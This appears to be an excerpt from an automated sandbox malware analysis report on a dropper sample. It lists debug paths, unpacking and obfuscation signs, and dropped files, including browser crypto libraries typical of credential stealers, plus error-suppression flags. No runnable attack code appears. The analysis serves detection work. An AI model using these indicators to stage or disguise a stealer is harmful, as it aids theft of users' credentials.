                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938719141.00000173F2420000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1807890245.000000006C967000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000F.00000002.2048249667.000000006C1F7000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942501439.00000173F45E0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: FCBAECGIEB.exe, 00000016.00000002.2883604441.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, FCBAECGIEB.exe, 00000016.00000000.2059092931.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, tiktok[1].exe.1.dr
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: nss3.pdb source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp

                                Data Obfuscation

                                barindex
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeUnpacked PE file: 0.2.g77dRQ1Csm.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeUnpacked PE file: 1.2.u42w.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeUnpacked PE file: 0.2.g77dRQ1Csm.exe.400000.0.unpack
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeUnpacked PE file: 1.2.u42w.0.exe.400000.0.unpack
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                                Source: relay.dll.0.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                                Source: relay.dll.2.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                                Source: cqecfsbe.3.drStatic PE information: real checksum: 0x0 should be: 0xc411c
                                Source: tiktok[1].exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                                Source: g77dRQ1Csm.exeStatic PE information: real checksum: 0x68bd0 should be: 0x68bd6
                                Source: FCBAECGIEB.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                                Source: u42w.3.exe.0.drStatic PE information: section name: .didata
                                Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                                Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                                Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                                Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                                Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                                Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                                Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                                Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                                Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                                Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0042786C push ecx; ret 0_2_0042787C
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0042780C push eax; ret 0_2_0042782A
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0042E3A5 push esi; ret 0_2_0042E3AE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6D9AB push ebp; iretd 0_2_02F6D9DE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6968B pushad ; retf 0_2_02F6968C
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6BF39 pushad ; retf 0_2_02F6BF40
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6A720 push ecx; iretd 0_2_02F6A726
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6BC23 push 2B991403h; ret 0_2_02F6BC2A
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6C549 push 00000061h; retf 0_2_02F6C551
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03171B72 push dword ptr [esp+ecx-75h]; iretd 0_2_03171B76
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0316C3FF push esp; retf 0_2_0316C407
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03159A1D push ecx; ret 0_2_03159A30
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03177A73 push eax; ret 0_2_03177A91
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0316C9FD push esp; retf 0_2_0316C9FE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03159F6D push ecx; ret 0_2_03159F80
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004176C5 push ecx; ret 1_2_004176D8
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C03B536 push ecx; ret 1_2_6C03B549
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_007FFAB6 push ecx; ret 2_2_007FFAC9
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_007FFB55 push ecx; ret 2_2_007FFB68
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006B0F0B push 8B0086D1h; retf 2_2_006B0F10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C9447D9 push ecx; ret 2_2_6C9447EC
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C946365 push ecx; ret 2_2_6C946378
                                Source: cqecfsbe.3.drStatic PE information: section name: .text entropy: 6.816444465715168
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\cqecfsbeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile created: C:\Users\user\AppData\Local\Temp\u42w.0.exeJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile created: C:\Users\user\AppData\Local\Temp\u42w.3.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile created: C:\Users\user\AppData\Local\Temp\u42w.2\relay.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile created: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\cqecfsbeJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo ApplicationsJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CQECFSBE
                                Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OYSKBSUQGRWDG
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
